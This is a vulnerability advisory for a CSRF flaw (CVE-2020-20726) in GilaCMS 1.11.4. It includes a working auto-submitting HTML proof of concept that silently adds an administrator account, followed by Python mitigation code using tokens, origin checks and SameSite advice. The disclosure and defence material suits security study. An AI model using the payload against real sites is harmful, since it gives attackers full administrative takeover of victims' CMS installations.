CVE-2020-20726: There is a CSRF vulnerability that can add an administrator account · Issue #51 · GilaCMS/gila

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the cm/update_rows/user parameter.

Category: CVE
Tags: #csrf #vulnerability #java

CSRF vulnerability
There is a CSRF vulnerability that allows adding an administrator account.
After the administrator has logged in, open the following page.
PoC
Hack.html: adds an administrator account

```html
<html><body>
<script type="text/javascript">
// Builds a hidden form pointing at the CMS endpoint and submits it automatically.
// The browser attaches the logged-in administrator's session cookie, and the
// endpoint performs no CSRF-token or origin check, so the request is accepted.
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
p.enctype ="multipart/form-data";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
// Initialised to an empty string; the original left it undefined, which
// prepends the text "undefined" to the form markup.
var fields = "";

fields += "<input type='hidden' name='username' value='admin' />";
fields += "<input type='hidden' name='email' value='1620449914@qq.com' />";
fields += "<input type='hidden' name='pass' value='admin' />";
fields += "<input type='hidden' name='userrole[]' value='1' />";
fields += "<input type='hidden' name='active' value='1' />";
var url = "http://192.168.0.103/cm/update_rows/user";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```
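The PoC works because a `multipart/form-data` POST is a "simple" cross-site request: the browser sends it without a CORS preflight and attaches the victim's session cookie, and the `cm/update_rows/user` endpoint accepts the request on the strength of that cookie alone. The fix on the server side is to tie every state-changing request to something a cross-site page cannot supply. The following is an added illustration, not GilaCMS code: a minimal request guard combining a per-session synchronizer token (compared in constant time) with an `Origin`/`Referer` check, wrapped around a stand-in for the user-creation handler. The site origin, the session and form dictionaries, and the sample requests are all constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed placeholder for the deployed CMS origin (assumption, not from the page).
SITE_ORIGIN = "https://cms.example.test"


def issue_csrf_token(session):
    """Mint a random per-session token and store it server-side; the
    application embeds it in every legitimate form it renders."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers, site_origin=SITE_ORIGIN):
    """Accept the request only if Origin (or, failing that, Referer) names
    our own origin. State-changing requests with neither header are refused."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = "%s://%s" % (parts.scheme, parts.netloc)
    return origin == site_origin


def csrf_check(session, form, headers, site_origin=SITE_ORIGIN):
    """Return (ok, reason). A forged cross-site form fails the origin check,
    and even a same-origin request must carry the session's token."""
    if not origin_allowed(headers, site_origin):
        return False, "origin mismatch"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False, "missing token"
    # Constant-time comparison avoids leaking the token byte by byte.
    if not hmac.compare_digest(expected, supplied):
        return False, "token mismatch"
    return True, "ok"


def update_rows_user(session, form, headers):
    """Stand-in for the user-creation handler: the CSRF guard runs before
    any state is changed. Returns (status, body)."""
    ok, reason = csrf_check(session, form, headers)
    if not ok:
        return 403, {"error": reason}
    return 200, {"created": form["username"], "role": form.get("userrole[]")}


def demo():
    """Constructed traffic: one legitimate same-origin submission carrying the
    token, and one auto-submitted form shaped like the PoC above."""
    session = {}
    token = issue_csrf_token(session)
    legit = update_rows_user(
        session,
        {"username": "editor", "userrole[]": "2", "csrf_token": token},
        {"Origin": SITE_ORIGIN},
    )
    forged = update_rows_user(
        session,
        {"username": "admin", "pass": "admin", "userrole[]": "1", "active": "1"},
        {"Origin": "http://attacker.example.test"},
    )
    return legit, forged


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a worthwhile second layer: the browser then withholds the cookie from the cross-site POST in the first place, so the forged request arrives unauthenticated even if a handler somewhere forgets the token check.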

Screenshots (images not included in this copy)
1. Access the dangerous page
2. An administrator account has been added

Impact version

Related news

GHSA-4cw3-rhqx-vqwr: GilaCMS Cross Site Request Forgery vulnerability

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the `cm/update_rows/user` parameter.
